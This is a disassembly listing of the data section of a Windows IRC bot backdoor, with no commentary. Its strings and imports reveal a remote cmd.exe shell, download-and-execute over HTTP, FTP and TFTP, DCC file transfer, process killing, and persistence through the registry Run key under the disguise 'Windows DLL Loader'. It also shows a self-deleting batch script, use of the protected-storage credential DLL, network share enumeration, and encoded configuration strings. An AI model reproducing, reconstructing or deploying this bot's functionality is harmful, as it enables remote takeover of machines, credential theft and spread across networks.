aCryptgenrandom db 'CryptGenRandom',0
align 2
aE db '…',0
aCryptacquireco db 'CryptAcquireContextA',0
align 2
aAdvapi32_dll db 'ADVAPI32.dll',0
align 4
db 7
db 1, 53h, 68h
aEllexecutea db 'ellExecuteA',0
aShell32_dll db 'SHELL32.dll',0
db 0BDh ; ½
db 1, 5Fh, 73h
aTrcmpi db 'trcmpi',0
align 10h
db 34h ; 4
db 1, 5Fh, 69h
db 74h ; t
db 6Fh, 61h, 0
db 0C5h ; Å
db 1, 5Fh, 73h
aTrnicmp db 'trnicmp',0
aA_0 db 'A',0
a_cxxthrowexcep db '_CxxThrowException',0
align 2
dw 0Eh
a??1type_info@@ db '??1type_info@@UAE@XZ',0
align 2
dw 252h
aLocalfree db 'LocalFree',0
aOleaut32_dll db 'OLEAUT32.dll',0
align 200h
seg001 ends
; Section 3. (virtual address 00012000)
; Virtual size : 00007000 ( 28672.)
; Section size in file : 00007000 ( 28672.)
; Offset to raw data for section: 00012000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_data segment para public 'CODE' use32
assume cs:_data
;org 412000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
off_412000 dd offset dword_412098 ; DATA XREF: sub_401000+C�r
; sub_401000+1C�o
dd offset dword_41205C
dd offset dword_412040
dd offset dword_412014
dd 0
dword_412014 dd 0E6BA9DC5h, 0E2B3B1EDh, 0FC85FED1h, 0EDF6F498h, 0DD9BB0F8h
; DATA XREF: .data:0041200C�o
dd 0D58AAFC4h, 0F798CFF8h, 0EEDAF282h, 0D39A88CAh, 2 dup(0)
dword_412040 dd 0C68FABC5h, 0C49D9DDFh, 0FA9EC1F8h, 0EDC6EF84h, 0FDB5B0F0h
; DATA XREF: .data:00412008�o
dd 0B9E4h, 0
dword_41205C dd 0C68FABC5h, 0C49D9DDFh, 0FA9EC1F8h, 0EDC6EF84h, 0E5B5B0F0h
; DATA XREF: .data:00412004�o
dd 0CE8B92C1h, 0DAABFFD3h, 0E7C7F283h, 0D7BFB0F8h, 0CE868FDAh
dd 0ECA5D0CAh, 0F0D0D398h, 0D78AADE0h, 0DBh, 0
dword_412098 dd 0C68FABC5h, 0C49D9DDFh, 0FA9EC1F8h, 0EDC6EF84h, 0E5B5B0F0h
; DATA XREF: .data:off_412000�o
dd 0CE8B92C1h, 0DAABFFD3h, 0E7C7F283h, 0D7BFB0F8h, 0CE868FDAh
dd 0ECA5D0CAh, 98h, 0
dword_4120CC dd 2343003h, 2037525h, 746F6220h, 20297328h, 6E756F66h
; DATA XREF: sub_4011C4+2CA�o
dd 69772064h, 73206874h, 6E697274h, 30032067h, 73250234h
dd 2E0203h
dword_4120F8 dd 62206F4Eh, 2073746Fh, 6E756F66h, 69772064h, 73206874h
; DATA XREF: sub_4011C4+2B1�o
dd 6E697274h, 30032067h, 73250234h, 2E0203h
dword_41211C dd 6E756F66h, 74732064h, 676E6972h, 34300320h, 3732502h
; DATA XREF: sub_4011C4+215�o
dd 6E692002h, 20732520h, 34300328h, 3692502h, 2902h
dword_412144 dd 3430032Dh, 3752502h, 4C202D02h, 69747369h, 6220676Eh
; DATA XREF: sub_4011C4+46�o
dd 2073746Fh, 68746977h, 72747320h, 20676E69h, 2343003h
dd 2037325h, 3Ah
dword_412174 dd 62207325h, 2073746Fh, 68746977h, 72747320h, 20676E69h
; DATA XREF: sub_4014B0+6C�o
dd 2343003h, 2037325h, 0
aKilling db 'Killing',0 ; DATA XREF: sub_4014B0+65�o
aListing db 'Listing',0 ; DATA XREF: sub_4014B0+5B�o
dword_4121A4 dd 303h ; DATA XREF: sub_401571+91�o
aCmd_exeProcess db 'Cmd.exe process has terminated.',0 ; DATA XREF: sub_401621+25F�o
aCouldNotReadDa db 'Could not read data from process.',0 ; DATA XREF: sub_401621+24C�o
align 4
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_401621+4A�o
aErrorWhileExec db 'Error while executing command.',0 ; DATA XREF: sub_4018D5+9C�o
align 4
asc_412214 db 0Dh,0Ah,0 ; DATA XREF: sub_4018D5+84�o
; sub_402EFD+148�o ...
align 4
aRemoteCmdThrea db 'Remote cmd thread',0 ; DATA XREF: sub_4018D5+6B�o
align 4
aOpen db 'open',0 ; DATA XREF: sub_4018D5+22�o
; sub_402230+507�o ...
align 4
dword_412234 dd 65636552h, 64657669h, 34300320h, 3732502h, 72662002h
; DATA XREF: sub_401985+1C7�o
dd 3206D6Fh, 25023430h, 20020373h, 3206E69h, 25023430h
dd 66322E30h, 65730203h, 69772063h, 3206874h, 25023430h
dd 66332E30h, 424B0203h, 6365732Fh, 0
dword_412280 dd 3430032Dh, 3752502h, 52202D02h, 69656365h, 676E6976h
; DATA XREF: sub_401985+BC�o
dd 34300320h, 3732502h, 72662002h, 3206D6Fh, 25023430h
dd 20373h
dword_4122AC dd 6277h ; DATA XREF: sub_401985+3C�o
; sub_402018+12D�o ...
dword_4122B0 dd 746E6553h, 34300320h, 3732502h, 6F742002h, 34300320h
; DATA XREF: sub_401B81+2D0�o
dd 3732502h, 6E692002h, 34300320h, 2E302502h, 2036632h
dd 20636573h, 68746977h, 34300320h, 2E302502h, 2036633h
dd 732F424Bh, 6365h
dword_4122F4 dd 6E617254h, 72656673h, 20666F20h, 2343003h, 2037325h
; DATA XREF: sub_401B81+250�o
dd 206F7420h, 2343003h, 2037325h, 6E616320h, 6C6C6563h
dd 6465h
dword_412320 dd 3430032Dh, 3752502h, 53202D02h, 69646E65h, 320676Eh
; DATA XREF: sub_401B81+1C7�o
dd 25023430h, 20020373h, 3206F74h, 25023430h, 20373h
dword_412348 dd 43434401h, 4E455320h, 25222044h, 25202273h, 73252064h
; DATA XREF: sub_401B81+17E�o
dd 1642520h, 0
aDccSendSS db 'DCC Send %s (%s)',0 ; DATA XREF: sub_401B81+147�o
align 4
aRb db 'rb',0 ; DATA XREF: sub_401B81+EB�o
; sub_404691+62�o ...
align 4
dword_41237C dd 65636552h, 6E697669h, 30032067h, 73250234h, 66200203h
; DATA XREF: sub_401EA8+E2�o
dd 206D6F72h, 2343003h, 2037325h, 0
dword_4123A0 dd 646E6553h, 20676E69h, 2343003h, 2037325h, 206F7420h
; DATA XREF: sub_401FA3+5D�o
dd 2343003h, 2037325h, 0
aContentLengthU db 'Content-Length: %u',0Dh,0Ah,0 ; DATA XREF: sub_402018+D7�o
align 4
aContentLength db 'Content-Length: ',0 ; DATA XREF: sub_402018+AF�o
align 4
asc_4123EC db 0Dh,0Ah ; DATA XREF: sub_402018+92�o
db 0Dh,0Ah,0
align 4
aGetSHttp1_0Hos db 'GET /%s HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_402018+40�o
; sub_405CC8+BA�o
db 'Host: %s',0Dh,0Ah
db 0Dh,0Ah,0
align 4
unk_412414 db 2Dh ; - ; DATA XREF: sub_402230+573�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aUnsupportedPro db '- Unsupported protocol specified.',0
align 10h
dword_412440 dd 3430032Dh, 3752502h, 45202D02h, 726F7272h, 69687720h
; DATA XREF: sub_402230+549�o
dd 6420656Ch, 6C6E776Fh, 6964616Fh, 320676Eh, 25023430h
dd 2E020373h, 0
dword_412470 dd 3430032Dh, 3752502h, 55202D02h, 6C62616Eh, 6F742065h
; DATA XREF: sub_402230+533�o
dd 61747320h, 3207472h, 25023430h, 2E020373h, 0
dword_412498 dd 3430032Dh, 3752502h, 53202D02h, 65636375h, 75667373h
; DATA XREF: sub_402230+4C9�o
dd 20796C6Ch, 6E776F64h, 64616F6Ch, 3206465h, 25023430h
dd 20020373h, 68746977h, 34300320h, 2E302502h, 2036632h
dd 732F424Bh, 73256365h, 2Eh
dword_4124E0 dd 7865202Ch, 74756365h, 676E69h ; DATA XREF: sub_402230+476�o
dword_4124EC dd 7075202Ch, 69746164h, 676Eh ; DATA XREF: sub_402230+46C�o
unk_4124F8 db 2Dh ; - ; DATA XREF: sub_402230+34D�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aNoFileToDownlo db '- No file to download specified.',0
align 4
asc_412524: ; DATA XREF: sub_402230+332�o
unicode 0, </>,0
asc_412528: ; DATA XREF: sub_402230+2D0�o
; sub_40F54D+334�o
unicode 0, <:>,0
a69 db '69',0 ; DATA XREF: sub_402230+280�o
align 10h
aTftp db 'tftp://',0 ; DATA XREF: sub_402230+262�o
aAnonymous db 'anonymous',0 ; DATA XREF: sub_402230+22F�o
align 4
a21 db '21',0 ; DATA XREF: sub_402230+20F�o
align 4
aFtp db 'ftp://',0 ; DATA XREF: sub_402230+1F5�o
align 10h
a80 db '80',0 ; DATA XREF: sub_402230+1BF�o
; sub_4033B0+28�o ...
align 4
aHttp db 'http://',0 ; DATA XREF: sub_402230+1A5�o
dword_41255C dd 3430032Dh, 3752502h, 43202D02h, 6F6E6E61h, 65722074h
; DATA XREF: sub_402230+10D�o
dd 73206461h, 6372756Fh, 69662065h, 320656Ch, 25023430h
dd 2E020373h, 0
dword_41258C dd 3430032Dh, 3752502h, 43202D02h, 6F6E6E61h, 72772074h
; DATA XREF: sub_402230+F4�o
dd 20657469h, 64206F74h, 69747365h, 6974616Eh, 66206E6Fh
dd 20656C69h, 2343003h, 2037325h, 2Eh
dword_4125C4 dd 656C6966h, 2F2F3Ah ; DATA XREF: sub_402230+AB�o
dword_4125CC dd 3430032Dh, 3752502h, 44202D02h, 6C6E776Fh, 6964616Fh
; DATA XREF: sub_402230+98�o
dd 320676Eh, 25023430h, 20020373h, 3206F74h, 25023430h
dd 2E020373h, 0
dword_4125FC dd 6E776F44h, 64616F6Ch, 20676E69h, 2343003h, 2037325h
; DATA XREF: sub_4027CB+97�o
dd 206F7420h, 2343003h, 2037325h, 0
dword_412620 dd 6578652Eh, 0 ; DATA XREF: sub_4027CB+3F�o
; sub_40D7FD+44�o
aQuitRestarting db 'QUIT :restarting',0 ; DATA XREF: sub_40287C:loc_402A00�o
; sub_40735A+9B8�o
align 4
aQuitExitting db 'QUIT :exitting',0 ; DATA XREF: sub_40287C+17D�o
; sub_40735A:loc_4083B6�o
align 4
dword_41264C dd 3430032Dh, 62656402h, 2036775h ; DATA XREF: sub_40287C+104�o
aModuleSReporte db '- Module "%s" reported a crash in "%s": N=%u EAX=%08X EBX=%08X EC'
db 'X=%08X EDX=%08X ESI=%08X EDI=%08X EBP=%08X ESP=%08X EIP=%08X EFLA'
db 'GS=%08X. Code: %08X (%s). %s...',0
align 4
aContinuing db 'Continuing',0 ; DATA XREF: sub_40287C+B3�o
align 4
aRestarting db 'Restarting',0 ; DATA XREF: sub_40287C+AC�o
align 4
aException_flt db 'EXCEPTION_FLT',0 ; DATA XREF: sub_40287C:loc_40291F�o
align 4
aException_int_ db 'EXCEPTION_INT_DIVIDE_BY_ZERO',0 ; DATA XREF: sub_40287C:loc_402918�o
align 4
aException_stac db 'EXCEPTION_STACK_OVERFLOW',0 ; DATA XREF: sub_40287C+95�o
align 10h
aException_nonc db 'EXCEPTION_NONCONTINUABLE_EXCEPTION',0
; DATA XREF: sub_40287C:loc_4028EA�o
align 4
aException_brea db 'EXCEPTION_BREAKPOINT',0 ; DATA XREF: sub_40287C:loc_4028E3�o
align 4
aException_acce db 'EXCEPTION_ACCESS_VIOLATION',0 ; DATA XREF: sub_40287C:loc_4028DC�o
align 4
aException_ille db 'EXCEPTION_ILLEGAL_INSTRUCTION',0 ; DATA XREF: sub_40287C+59�o
align 4
aException_othe db 'EXCEPTION_OTHER',0 ; DATA XREF: sub_40287C+34�o
aInternetgetcon db 'InternetGetConnectedStateExA',0 ; DATA XREF: sub_402D7B+172�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_402D7B:loc_402EE2�o
aPstorecreatein db 'PStoreCreateInstance',0 ; DATA XREF: sub_402D7B+15A�o
align 4
aPstorec_dll db 'pstorec.dll',0 ; DATA XREF: sub_402D7B:loc_402ECA�o
aFreeaddrinfo db 'freeaddrinfo',0 ; DATA XREF: sub_402D7B+108�o
align 4
aGetnameinfo db 'getnameinfo',0 ; DATA XREF: sub_402D7B+FB�o
aGetaddrinfo db 'getaddrinfo',0 ; DATA XREF: sub_402D7B+F3�o
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_402D7B:loc_402E65�o
align 4
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_402D7B+D8�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_402D7B+CB�o
align 4
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_402D7B+BE�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_402D7B+B6�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_402D7B:loc_402E24�o
aNetaddalternat db 'NetAddAlternateComputerName',0 ; DATA XREF: sub_402D7B+97�o
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_402D7B+8A�o
align 4
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_402D7B+7D�o
align 10h
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_402D7B+70�o
align 10h
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_402D7B+63�o
align 10h
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_402D7B+56�o
aNetusedel db 'NetUseDel',0 ; DATA XREF: sub_402D7B+49�o
align 4
aNetuseadd db 'NetUseAdd',0 ; DATA XREF: sub_402D7B+3C�o
align 4
aNetusegetinfo db 'NetUseGetInfo',0 ; DATA XREF: sub_402D7B+34�o
align 4
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_402D7B+27�o
align 4
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0 ; DATA XREF: sub_402D7B+19�o
align 4
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_402D7B+8�o
align 4
aUseridUnix db ' : USERID : UNIX : ',0 ; DATA XREF: sub_402EFD+127�o
dword_4129C0 dd 3430032Dh, 3752502h, 52202D02h, 696E6E75h, 6920676Eh
; DATA XREF: sub_402EFD+6B�o
dd 746E6564h, 65732064h, 72657672h, 206E6F20h, 74726F70h
dd 34300320h, 3732502h, 2
dword_4129F4 dd 6E656449h, 73206474h, 65767265h, 6E6F2072h, 726F7020h
; DATA XREF: sub_4030A7+5E�o
dd 30032074h, 73250234h, 203h
dword_412A14 dd 333131h ; DATA XREF: sub_4030A7:loc_4030BC�o
dword_412A18 dd 9C9EB3E1h, 0CF809E9Eh, 0FC99A2C1h, 82h, 0 ; DATA XREF: sub_4033B0+A�o
dword_412A2C dd 73255C5Ch, 4350495Ch, 24h ; DATA XREF: sub_40311D+18�o
dword_412A38 dd 2E3031h ; DATA XREF: sub_403201+48�o
dword_412A3C dd 2E323931h, 2E383631h, 0 ; DATA XREF: sub_403201+34�o
dword_412A48 dd 2E323731h, 0 ; DATA XREF: sub_403201+20�o
dword_412A50 dd 2E373231h, 0 ; DATA XREF: sub_403201+7�o
dword_412A58 dd 252E7525h, 75252E75h, 75252Eh ; DATA XREF: sub_408F9D+172�o
; sub_40CA47+1DF�o
dword_412A64 dd 313A3Ah ; DATA XREF: sub_403342+3C�o
aGetmoduleinfor db 'GetModuleInformation',0 ; DATA XREF: sub_403E9B+47�o
align 10h
aGetmodulefilen db 'GetModuleFileNameExA',0 ; DATA XREF: sub_403E9B+3A�o
align 4
aEnumprocessmod db 'EnumProcessModules',0 ; DATA XREF: sub_403E9B+2D�o
align 4
aEnumprocesses db 'EnumProcesses',0 ; DATA XREF: sub_403E9B+25�o
align 4
aPsapi_dll db 'psapi.dll',0 ; DATA XREF: sub_403E9B+B�o
align 4
aSystem db 'system',0 ; DATA XREF: sub_403F1D+C5�o
; .data:004156C4�o ...
align 10h
dword_412AD0 dd 2343003h, 3693425h, 25202E02h, 20583830h, 58383025h
; DATA XREF: sub_404143+7E�o
dd 732520h
dword_412AE8 dd 3430032Dh, 3752502h, 4C202D02h, 69747369h, 320676Eh
; DATA XREF: sub_404143+48�o
dd 25023430h, 2032569h, 6F727020h, 73736563h, 3A7365h
dword_412B10 dd 7473694Ch, 6F727020h, 73736563h, 7365h ; DATA XREF: sub_404202+27�o
dword_412B20 dd 58323025h, 0 ; DATA XREF: sub_4043B3+1C4�o
; sub_40F089+D�o
dword_412B28 dd 58383025h, 0 ; DATA XREF: sub_4043B3+181�o
; sub_40735A+E1D�o
dword_412B30 dd 7325h ; DATA XREF: sub_4043B3+15F�o
; sub_4058D7+2BA�o ...
aHkus db 'HKUS',0 ; DATA XREF: sub_4043B3+79�o
align 4
aHklm db 'HKLM',0 ; DATA XREF: sub_4043B3+5D�o
align 4
aHkcu db 'HKCU',0 ; DATA XREF: sub_4043B3+41�o
align 4
aHkcr db 'HKCR',0 ; DATA XREF: sub_4043B3+25�o
align 4
off_412B54 dd offset dword_412D9C ; DATA XREF: sub_4049B5+2E�r
; sub_4049B5+3C�o ...
off_412B58 dd offset dword_412D74 ; DATA XREF: sub_4049B5+156�r
; sub_4049B5+167�r ...
dd offset dword_412D64
dd offset dword_412D74
dd offset dword_412D54
dd offset dword_412D30
dd offset dword_412D20
dd offset dword_412D00
dd offset dword_412CEC
dd offset dword_412D00
dd offset dword_412CD8
dd offset dword_412CC0
dd offset dword_412CB0
dd offset dword_412C9C
dd offset dword_412C88
dd offset dword_412C68
dd offset dword_412C54
dd offset dword_412C38
dd offset dword_412C28
dd offset dword_412C38
dd offset dword_412C18
dd offset dword_412BF0
dd offset loc_412BDC
dd offset dword_412BBC
dd 2 dup(0)
dword_412BBC dd 0C08AADDBh, 0C7808FC7h, 0F7BEACD0h, 0ECC7E582h, 0F7C9B0F3h
; DATA XREF: .data:00412BB0�o
dd 0CE838CD0h, 85E9D6h, 0
; ---------------------------------------------------------------------------
loc_412BDC: ; DATA XREF: .data:00412BAC�o
jmp dword ptr [ecx-6C3B3D6Fh]
; ---------------------------------------------------------------------------
dw 0C49Dh
dd 0FC8FE98Ah, 2 dup(0)
dword_412BF0 dd 0DE99B4D7h, 0D58E9FC1h, 0B999E3CDh, 0E7CCE1BAh, 0D3AEE4E4h
; DATA XREF: .data:00412BA8�o
dd 0C09899DCh, 0FCA4ACDDh, 0E1DCF684h, 0F3h, 0
dword_412C18 dd 0C18EA8F7h, 0C4979986h, 2 dup(0) ; DATA XREF: .data:00412BA4�o
dword_412C28 dd 0DD86B4E5h, 8F998FE1h, 92F4C1h, 0 ; DATA XREF: .data:00412B9C�o
dword_412C38 dd 0DD86B4C5h, 819D99C4h, 0CA95F9F7h, 0E7C1F38Fh, 0C2A8E4FBh
; DATA XREF: .data:00412B98�o
; .data:00412BA0�o
dd 0D8h, 0
dword_412C54 dd 0DD86B4E5h, 0C2998FC4h, 0FC8FE98Ah, 2 dup(0) ; DATA XREF: .data:00412B94�o
dword_412C68 dd 0D687ADC1h, 819C8BC7h, 0EE83E9EAh, 0A2DEF299h, 0D79BADD0h
; DATA XREF: .data:00412B90�o
dd 0CD839DDFh, 2 dup(0)
dword_412C88 dd 0D79BADF0h, 0CD839DDFh, 0FC8FE98Ah, 2 dup(0) ; DATA XREF: .data:00412B8C�o
dword_412C9C dd 0D387ADC1h, 0E0CF8CC5h, 0ED99E9C3h, 2 dup(0) ; DATA XREF: .data:00412B88�o
dword_412CB0 dd 0D387ADE1h, 0C4C18CC5h, 0E9DCh, 0 ; DATA XREF: .data:00412B84�o
dword_412CC0 dd 0D687ADC1h, 819C8BC7h, 0F587F4E1h, 0F0D0F299h, 2 dup(0)
; DATA XREF: .data:00412B80�o
dword_412CD8 dd 0DE99BCF3h, 0D38A8EC7h, 0FC8FE98Ah, 2 dup(0) ; DATA XREF: .data:00412B7C�o
dword_412CEC dd 0FB87ADE1h, 0CF809BC7h, 0FC8FE98Ah, 2 dup(0) ; DATA XREF: .data:00412B74�o
dword_412D00 dd 0D687ADC1h, 819C8BC7h, 0F690E3E8h, 0F2F4A098h, 0D180A8E6h
; DATA XREF: .data:00412B70�o
; .data:00412B78�o
dd 0CE8688C9h, 0CAh, 0
dword_412D20 dd 0DD8EABFAh, 0D98AD2C6h, 0C1h, 0 ; DATA XREF: .data:00412B6C�o
dword_412D30 dd 0D780A8D5h, 0F2CF88C6h, 0FC81FEC1h, 0F7E7A084h, 0DF80B0F8h
; DATA XREF: .data:00412B68�o
dd 0D3BFDCCDh, 0EA92EFCBh, 85h, 0
dword_412D54 dd 0C19BB7F5h, 0C4979986h, 2 dup(0) ; DATA XREF: .data:00412B64�o
dword_412D64 dd 0C188B7DFh, 0D98AD2DBh, 0C1h, 0 ; DATA XREF: .data:00412B5C�o
dword_412D74 dd 0D38AABDAh, 0C4BCDCC4h, 0F085F9C7h, 0C395F982h, 0DD81B0E3h
; DATA XREF: .data:off_412B58�o
; .data:00412B60�o
dd 0D89B95DAh, 0EB92DF84h, 0E7D6E980h, 2 dup(0)
dword_412D9C dd 0D39AB7FAh, 0D98AD2DBh, 0C1h, 0 ; DATA XREF: .data:off_412B54�o
dword_412DAC dd 293Ah ; DATA XREF: sub_4045E4+8B�o
dword_412DB0 dd 5Ch ; DATA XREF: sub_4045E4+22�o
; sub_404691+21�o ...
dword_412DB4 dd 7078655Ch, 65726F6Ch, 78652E72h, 65h ; DATA XREF: sub_404715+24�o
aSoftwareMicros db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_4047C0+1A�o
align 4
a@echoOffDelete db '@echo off',0Dh,0Ah ; DATA XREF: sub_4048CF+99�o
db ':deleteagain',0Dh,0Ah
db 'del /A:H /F %s',0Dh,0Ah
db 'del /F %s',0Dh,0Ah
db 'if exist %s goto deleteagain',0Dh,0Ah
db 'del %s',0Dh,0Ah,0
align 10h
a_bat db '.bat',0 ; DATA XREF: sub_4048CF+42�o
align 4
aWindowsDllLoad db 'Windows DLL Loader',0 ; DATA XREF: sub_4049B5+132�o
; sub_404BC3+AA�o
align 4
aQuitSUninstall db 'QUIT :%s uninstalled.',0 ; DATA XREF: sub_404BC3+D3�o
; sub_404BC3+151�o
align 4
dword_412E84 dd 6E6E6F43h, 69746365h, 66206E6Fh, 206D6F72h, 2343003h
; DATA XREF: sub_404D33+DD�o
dd 2037325h, 206F7420h, 6B636F73h, 34300373h, 3752502h
dd 65732002h, 72657672h, 7325h
dword_412EB8 dd 6A657220h, 65746365h, 64h ; DATA XREF: sub_404D33+C2�o
dword_412EC4 dd 3430032Dh, 3752502h, 52202D02h, 696E6E75h, 7320676Eh
; DATA XREF: sub_404F90+68�o
dd 736B636Fh, 72657320h, 20726576h, 70206E6Fh, 2074726Fh
dd 2343003h, 2037325h, 0
dword_412EF8 dd 6B636F53h, 65732073h, 72657672h, 206E6F20h, 74726F70h
; DATA XREF: sub_4050D1+85�o
dd 34300320h, 3732502h, 2
dword_412F18 dd 20h ; DATA XREF: sub_4051D2+39�o
; sub_4051D2+6F�o ...
dword_412F1C dd 30h ; DATA XREF: sub_4054C3+85�o
; sub_40849F+D6�o ...
; ---------------------------------------------------------------------------
loc_412F20: ; DATA XREF: sub_405580+DB�o
; sub_405670+AE�o
and eax, 73252E73h
db 2Eh
and eax, 73252E73h
loc_412F2B: ; DATA XREF: sub_405C57+5�o
add bl, bh
mov bh, 87h
pushf
retf
; ---------------------------------------------------------------------------
db 93h, 82h, 0
align 8
dword_412F38 dd 9C9EB3E1h, 0D39D99DCh, 0F694A2C5h, 0F0D7AE9Bh, 2 dup(0)
; DATA XREF: sub_405C57+11�o
dword_412F50 dd 9C87B7FBh, 99CCh, 0 ; DATA XREF: sub_405C57+1F�o
dword_412F5C dd 0DF9CA5F2h, 0D58A9286h, 2 dup(0) ; DATA XREF: sub_405C57+2D�o
dword_412F6C dd 0D586ABF1h, 0C0C199C4h, 0C1h, 0 ; DATA XREF: sub_405C57+3B�o
dword_412F7C dd 0D787ADF8h, 8F818FC5h, 0B79AE3C7h, 0F597h, 0 ; DATA XREF: sub_405C57+4B�o
off_412F90 dd offset dword_4130B4 ; DATA XREF: sub_405CC8+E�r
; sub_405CC8+18�o ...
off_412F94 dd offset dword_413080 ; DATA XREF: sub_405CC8+5B�r
dd offset dword_413064
dd offset dword_413020
dd offset dword_413008
dd offset dword_412FB0
align 10h
dword_412FB0 dd 0DC9EABF2h, 0C58E93C4h, 0F496EB8Ah, 0FB9BF393h, 0DD86ACF7h
; DATA XREF: .data:00412FA4�o
dd 0CC809F86h, 0F496EB8Bh, 0E69AF393h, 0DE87B3F9h, 8E8B9DC7h
dd 0F790E5D7h, 0F29AE493h, 0D38AB4F9h, 0C096D3D8h, 0C698E3CCh
dd 0E7DFE594h, 0D785A1E1h, 0D5B0CECCh, 0A8DABDC9h, 0E7CDE5D8h
dd 2 dup(0)
dword_413008 dd 0D5C7B7E3h, 0D28A91C9h, 0F08EA295h, 0E19BE79Bh, 0A9F9h
; DATA XREF: .data:00412FA0�o
dd 0
dword_413020 dd 0DC9EABF2h, 0C58E93C4h, 0A8D8BF8Bh, 0B19AE6D9h, 83DDA2A7h
; DATA XREF: .data:00412F9C�o
dd 8CD8CE9Ch, 0FCC3BC9Ch, 0E48DB4DBh, 0D1D1E9AFh, 94C2C499h
dd 0A093BDC5h, 0BA80E2C5h, 9D8CF7A3h, 0D28E8FC5h, 0B794E2DDh
dd 0D0F893h, 0
dword_413064 dd 0DC9EABF2h, 0C58E93C4h, 0FA9EE18Ah, 0EDC6EF84h, 0D1C7B0F0h
; DATA XREF: .data:00412F98�o
dd 91C7h, 0
dword_413080 dd 0D39DA5F2h, 8E819987h, 0B690E5C6h, 0F0C7F595h, 9D9DAAF3h
; DATA XREF: .data:off_412F94�o
dd 0C68093EFh, 0F6A3E9C8h, 0E3D7EC99h, 0C1878DE4h, 0CD839DDCh
dd 0FCD9FEC1h, 0E58Eh, 0
dword_4130B4 dd 0DE86ABE2h, 8F9D9DCAh, 0FE98E3C3h, 0E19BE59Ah, 0A9F9h
; DATA XREF: .data:off_412F90�o
dd 0
off_4130CC dd offset byte_415355 ; DATA XREF: sub_40587E+29�o
dword_4130D0 dd 74737953h, 69206D65h, 726F666Eh, 6974616Dh, 2D206E6Fh
; DATA XREF: sub_4058D7+29A�o
dd 3A534F20h, 6E695720h, 73776F64h, 34300320h, 3732502h
dd 25282002h, 76202C73h, 2343003h, 252E6425h, 2C020364h
dd 30036220h, 64250234h, 2E290203h, 55504320h, 7325203Ah
dd 34300320h, 3642502h, 7A484D02h, 6152202Eh, 3203A6Dh
dd 25023430h, 4D020364h, 30032F42h, 64250234h, 424D0203h
dd 65726620h, 49202E65h, 3A367650h, 34300320h, 3732502h
dd 55202E02h, 6D697470h, 3203A65h, 25023430h, 64020364h
dd 73257961h, 34300320h, 3642502h, 756F6802h, 20732572h
dd 2343003h, 2036425h, 756E696Dh, 73256574h, 6F43202Eh
dd 7475706Dh, 616E7265h, 203A656Dh, 2343003h, 2037325h
dd 7355202Eh, 203A7265h, 2343003h, 2037325h, 0A0D2Eh
dword_4131C0 dd 73h ; DATA XREF: sub_4058D7+239�o
; sub_405E4E+16E�o ...
aProcessornames db 'ProcessorNameString',0 ; DATA XREF: sub_4058D7+1FB�o
aHardwareDescri db 'HARDWARE\DESCRIPTION\System\CentralProcessor\0',0
; DATA XREF: sub_4058D7+1D1�o
align 4
aNo db 'No',0 ; DATA XREF: sub_4058D7+19A�o
; sub_405E4E+11D�o ...
align 4
aYes db 'Yes',0 ; DATA XREF: sub_4058D7+191�o
; sub_405E4E+118�o ...
a2003 db '2003',0 ; DATA XREF: sub_4058D7+16A�o
; .data:00415890�o
align 4
aXp db 'XP',0 ; DATA XREF: sub_4058D7+15A�o
align 4
a2000 db '2000',0 ; DATA XREF: sub_4058D7+14A�o
; .data:00415884�o
align 4
aMe db 'ME',0 ; DATA XREF: sub_4058D7+131�o
align 4
a98 db '98',0 ; DATA XREF: sub_4058D7+121�o
align 4
aNt db 'NT',0 ; DATA XREF: sub_4058D7+111�o
align 10h
a95 db '95',0 ; DATA XREF: sub_4058D7+103�o
align 4
aNoSp db 'no SP',0 ; DATA XREF: sub_4058D7+E8�o
align 4
a?: ; DATA XREF: sub_4058D7+E3�o
unicode 0, <?>,0
aSysinfoThread db 'Sysinfo thread',0 ; DATA XREF: sub_405BB3+21�o
align 10h
dword_413250 dd 7774654Eh, 206B726Fh, 6F666E69h, 74616D72h, 206E6F69h
; DATA XREF: sub_405E4E+1C8�o
dd 6F48202Dh, 203A7473h, 2343003h, 2037325h, 614E202Eh
dd 203A656Dh, 2343003h, 2037325h, 7954202Eh, 203A6570h
dd 2343003h, 2037325h, 5049202Eh, 203A3676h, 2343003h
dd 2037325h, 6946202Eh, 61776572h, 64656C6Ch, 3003203Ah
dd 73250234h, 202E0203h, 6574614Ch, 3A79636Eh, 34300320h
dd 3732502h, 25202C02h, 53202E75h, 64656570h, 3003203Ah
dd 30250234h, 366322Eh, 424B2B02h, 6365732Fh, 5249202Eh
dd 70552043h, 656D6974h, 3003203Ah, 64250234h, 61640203h
dd 20732579h, 2343003h, 2036425h, 72756F68h, 3207325h
dd 25023430h, 6D020364h, 74756E69h, 2E732565h, 0
aGood db 'Good',0 ; DATA XREF: sub_405E4E+15B�o
align 4
aAvarage db 'Avarage',0 ; DATA XREF: sub_405E4E+14F�o
aBad db 'Bad',0 ; DATA XREF: sub_405E4E+148�o
aLan db 'LAN',0 ; DATA XREF: sub_405E4E:loc_405F51�o
aModem db 'Modem',0 ; DATA XREF: sub_405E4E+FC�o
align 4
aUnknown_0 db 'Unknown',0 ; DATA XREF: sub_405E4E+AE�o
aNetinfoThread db 'Netinfo thread',0 ; DATA XREF: sub_40605E+21�o
